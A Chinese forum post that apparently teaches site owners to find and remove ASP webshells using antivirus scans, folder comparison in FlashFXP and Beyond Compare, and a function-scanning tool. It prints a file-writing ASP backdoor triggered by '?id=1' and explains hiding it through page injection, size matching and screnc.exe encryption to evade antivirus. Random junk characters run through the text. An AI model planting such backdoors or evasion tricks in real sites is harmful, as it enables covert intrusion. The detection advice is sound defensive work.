 TA的每日心情 | 开心
2014-7-28 21:47 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
网上的一些防范asp木马的教程都基于提前防范的基础之上,例如:禁止FSO,利用NTFS限制用户目录等等。这些方法虽然有效,但是都是基于提前防范的,而且对于一般的买空间来做网站的朋友来说显然不可能。我在这里讲讲如何有效的发现web空间中的asp木马并清除。
2 j. h" a1 J7 I3 i! G6 {3 A6 \% G6 T9 v2 Z# P1 ]) N- s& v& M
通过帮朋友整理web空间摸索出了一些技巧,这些技巧还挺管用,不敢独享,拿出来共享。
1 U, k: u/ M! }% c' m' }! B; S( ]' q0 a/ t* U
一.技巧1:杀毒软件查杀 7 r3 a/ P+ E9 G2 \" q
8 v4 X0 n0 F! \, R1 h7 f' c& [
一些朋友可能在成功得到上传权限之后,上传的asp木马是一些非常有名的asp木马,例如:cmdasp,海洋顶端木马,这些木马虽然功能强大,但是早已经被杀毒软件列入了黑名单,所以利用杀毒软件对web空间中的文件进行扫描,可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马,木马标注为:Script.ASP.Rootkit.10.a,在瑞星的网站上搜索一下,可以知道这就是海洋顶端木马。
' I1 ?" S3 h% _2 H- w" [$ l5 U/ M8 k/ M, ]
利用这种方法,可以有效的对抗一些小菜上传的asp木马,效果明显。
, E1 G8 ]- G S$ r3 t. g' k
/ H( A/ _: K9 J: i' m二.技巧2:FTP客户端对比
P" m: [, {# A9 `, Q, {/ ^: `
) C% M ?. q0 y+ ?8 C6 q1 C上面的方法虽然对菜鸟入侵者比较管用,但是遇到稍微有点意识的入侵者来说,几乎失去效果,因为他们完全可以对asp木马进行伪装,加密,使其躲藏杀毒软件,这样的手法比较多,我个人比较喜欢微软开发个的一个asp加密小工具:screnc.exe,screnc.exe是一款ASP加密程序,加密的程式比较安全,使代码完全改变,使用也非常简单。只需要在命令下输入: 9 e( A9 e7 Y# W( x
5 M6 r% q% N/ D: ^' L
screnc.exe,得到帮助命令:Usage: screnc [/?] [/f] [/xl] [/l ScriptLanguage] [/e DefaultExtension] 〈source〉 〈destination〉,根据提示,只需要输入:screnc.exe 要加密的asp木马名 输出的asp木马名,就可以完成加密伪装。 5 J6 S9 H/ f8 F# L7 e
7 Y9 n! |& t9 L( |0 m0 e: M+ V5 I
经过加密之后,记事本打开查看,可以看到标签:〈% ……%〉,〈script〉〈/script〉
`4 [; d2 K# i# b5 y( S' t7 j( ?) o, K n: E9 p
等标签内的代码成为一些“乱码”,而杀毒软件查杀asp木马是通过搜索关键字来查杀,着阿姨能够显然就躲过查杀。 2 M# _5 L! k& ?) z3 U
) {) Z% E- i5 W8 j盛大官方网站被黑,挂的网页木马代码就是利用screnc.exe来加密的,过了好几天才被发现,可见加密伪装手法的高超。
8 |6 T1 \% l" |4 x. u4 [, c1 T5 j% B
所以要采取另外的措施对付这种加密伪装的asp木马,我们可以利用一些FTP客户端软件(例如cuteftp,FlashFXP)提供的文件对比功能,通过对比FTP的中的web文件和本地的备份文件,发现是否错出可疑文件。 - r( W1 j2 f. a7 J
0 s+ T1 H q/ u' ]7 r, d8 c& @6 y这里以FlashFXP进行操作讲解。 4 n' }& R7 X$ X2 l; F! x, [
' c! m2 r7 r' J, u6 o
步骤1:打开FlashFXP,在左边窗口中跳转到本地web备份文件目录,在右边的FTP窗口中跳转到web目录下。
5 Q. X3 K" K7 e; X* Q3 m- l' }0 m/ K* o* a0 d. t4 }5 m
步骤2:点工具栏中的“工具”,选择其中的“比较文件夹命令”,即可进行对比文件夹,速度非常快。 $ X; h- D: U" E: X
$ {& S1 o& b* @8 Y4 Y% J
我们可以清楚的看到196个对象被过滤,在FTP空间中多出了这样几个asp文件:.asp,2005.asp等,这十有八九就是入侵者留下的asp后门,打开确认一下即可。 ( E, O' h9 K$ Q3 r R7 O l
三.技巧3:用Beyond Compare 2进行对比
% q( M# }+ ^1 h4 P* f" G* P$ r, \6 m3 _
上面的利用FTP客户端对比文件的方法,虽然有效,但是遇到渗透入文件的asp木马,那就无能为力了,这里介绍一款渗透性asp木马,可以将代码插入到指定web文件中,平常情况下不会显示,只有使用触发语句才能打开asp木马,其隐蔽性非常高。代码如下: 8 t& r5 H0 R# S0 f
$ e! d$ g7 `: D3 u. N; }9 m〈% / B& d5 E$ m- P- d8 _; t$ g
$ u. }. |& ^, f# H, don error resume next
3 C+ |; v0 W4 V- P. h3 y
4 L; N/ w! u4 B+ T$ p# zid=request("id")
- V! ?# d: e' F" O1 n$ x- e A% {' s1 H
if request("id")=1 then
3 k7 Q4 I$ F4 w9 B
6 e Z* s- w( xtestfile=Request.form("name") S& q( U+ n* v/ i. x+ s8 R
6 {2 A2 ]; k& }+ R1 H. `
msg=Request.form("message")
% `7 }* O8 O, m& l
1 Z) Q6 V3 u" K4 T: Qset fs=server.CreatObject("scripting.filesystemobject") 5 f" ?6 }' M9 _
6 Y8 c, R ?6 U$ U% S: g8 q
set thisfile=fs.openTestFile(testfile,8,True,0) - ]& ?6 @; I5 @8 E
5 a1 ^7 N& o6 }5 ^; Sthisfile.Writeline(""&msg&"") ; T5 v) T) B: u: I8 z4 H Q; {2 ^
8 h. D: @' C+ E' t; T" e6 P+ uthisfile.close
. k0 N N( m# B" e. j- Y# E7 r5 j" W# X+ U$ W* g: `5 h
set fs=nothing
8 ~& j/ P1 j6 g; X0 r* J* i) q" n% |+ h/ X% h0 y6 \, X2 ?5 S _" c. n
%〉 ' g1 Y+ W- ^$ D9 q, G, r, I
% d! K5 e: R% g: B' U- f! z: I〈from method="post" Action="保存"?id=1〉 n S; @7 b$ J! J( N) L
1 M( _& J' L1 }5 K* e9 N: r
〈input type="text" size="20" name="Name"
. y5 u; ?& L6 ~* P2 J3 A
$ T. V5 r( [ G2 eValue=〈%=server.mappath("XP.ASP")%〉〉
- A* s6 {4 g7 a$ _: S: g: f7 @: L2 k1 @6 u
〈textarea name="Message" class=input〉
. v; P) Q; v1 z# v2 X
4 q9 y4 N, {* R# u5 a# q' P9 M6 E! G$ t' S# U; i4 B
〈/textarea〉
- n. k' c4 r. s% K9 i% ^
) s& O/ Z/ ^0 y7 `0 L〈input type="Submit" name="send" Value="生成" 5 |0 {3 l+ S! ~/ V) z
7 ?& k! {' O- @5 i2 d8 K- _class=input〉
0 a6 C* D) W1 X& w+ K! T" d- C* }* D+ O u n
〈/from〉
( l' |/ y- M: W! o0 w6 k9 c" e) _, V7 L: ]2 t: F$ n m _* w
〈%end if%〉
% u6 {# I* F6 ~ w; E7 m9 z3 p, I$ `0 u; g
注意:在修改目标主机的web文件时,要注意这样的文件修改后没有效果,即含有类似于:〈!--#include file="inc/conn.asp"--〉这样的文件包含命令,这样的代码存在时,加入asp代码后根本不会显示出脚本后门,但是脚本后门代码不会影响原文件的显示和功能。 / a. B, O* D' c8 P4 n! j4 g
" ~, [- i$ b; O
假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改,插入了脚本后门代码,那么打开的方式是:www. target..com/editor_InsertPic.asp?id=1,注意后门的字符?id=1,有了这些字符,才能保证脚本后门显示出来!普通情况下打开www. target..com/editor_InsertPic.asp?id=1,是不会露出破绽的。
& t1 }$ Q( _$ f; V% X2 V& M m6 N7 R5 N$ c2 W1 g$ ]7 B
这招真是asp木马放置中非常狠的,如果遇到这样的情况,该怎么办?我们可以利用一款专业的文件对比工具Beyond Compare 2来完成木马的查找。 ) X9 o' f2 Y# _5 A
0 M+ D$ Y/ ?& y2 A( E5 ZBeyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示,查看方便。并且支持多种规则对比。
/ t3 t8 g3 @4 ^( D- n1 @
( q1 x, @9 }% y9 p+ t- |5 V( [看我来利用它完成渗透性asp木马的查找。
6 N, r6 m1 M. a5 m2 j6 {7 G- J2 X6 z; ?* f0 `. b) S' q2 M
步骤1:打开Beyond Compare 2,点工具栏中的“比较任务”,选择其中的选项:新建,在“比较模式”中选择“比较两个文件夹”。进入一下步,选择需要对比的两个文件夹路径,即备份过的网站文件以及从FTP上下载的网站文件,再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
9 l( o7 h* ?4 f( r/ a& b% r+ O8 r% W- ~* b
步骤2:比较完毕,软件界面左右两边分别显示了比较的结果,从中可以很容易找到哪个目录多出了什么文件。 8 C4 t- O7 v% B# Y/ a
" a4 E7 h" a5 {( w* }5 k( L
步骤3:文件名相同,但是大小不同的文件,会被软件用另外的颜色标注出来,选择上它们,然后选择工具栏的“操作”中的“比较内容”功能,即可展开两个文件的详细内容,从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧! $ P; o: R! X; g% g0 S0 M0 k
! ^4 d) o, t& a; l& E6 }: N. S
b: u/ F* Q, U; J N/ `1 V+ {8 y四.技巧4:利用组件性能找asp木马 # S; F% i8 k9 y9 d. x
- K' h3 k8 d4 v/ u4 d1 G0 V上面分门别类的介绍了几种asp木马的放置与查杀技巧,一般的菜鸟,老鸟恐怕都是利用上面的方法来放置asp木马吧!所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧?呵呵!先别急,还有一种BT的asp木马放置方法,你可能很难想到,放置思路是这样的:在目标web空间中寻找一个不常用的,比较合适的asp文件,打开它对其进行代码精简,然后再将渗透asp木马的代码插入,再对其进行精简,直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门,一般的入侵者恐怕很难做到这一点,因为要精简代码的同时还要保证asp木马的功能不会错误。
- T: G5 s# n; E5 k& v9 u" t6 j' T8 p, r j" F6 \
如果你恰恰遇到一个这样的入侵者,那么该怎么才能查出被他放置的asp木马呢?你可能认为这已经不太可能了,呵呵!完全可能,看我拿出宝贝来:思易asp木马追捕。 5 l9 p* H3 Q2 q5 [6 O- m
& z0 K" s9 N; c7 @! g
它是一款专门检索各种asp文件所带功能的asp软件,通过搜索asp木马含有的特殊字符,以及搜索利用变量创建对象及静态对象建立的代码,来找出可能含有疑点的asp文件,从而有效的防范asp木马。 2 g) _) z( f$ o: k
3 r2 A; y6 K4 S使用非常简单,只需要将文件asplist2.0.asp上传到web空间下,然后在地址拦中打开,就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马,这些功能也都是asp木马常用的:FSO,WS,SHELL,XML等等。
2 ~/ v) e# e# Z+ G9 ~- b* d( F
' ?. d2 {. g1 {8 k8 s一般的web文件很少具有这样的功能,只有那些可恶的asp木马才具有,可以看到一些文件具备了相当多的功能,这时候,就可以打开这些文件来确认是否是asp木马,非常有效。
$ L3 L7 @( q& U9 K' s! ~. a4 i) f( C5 J* Y# V$ e
大家在查找web空间的asp木马时,最好几种方法结合起来,这样就能有效的查杀被隐藏起来的asp木马。 |
|
/1 
IP卡
狗仔卡
发表于 2009-4-17 08:32:46
QQ好友和群
QQ空间
腾讯微博
腾讯朋友
收藏
分享
顶
踩
转发到微博
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡
楼主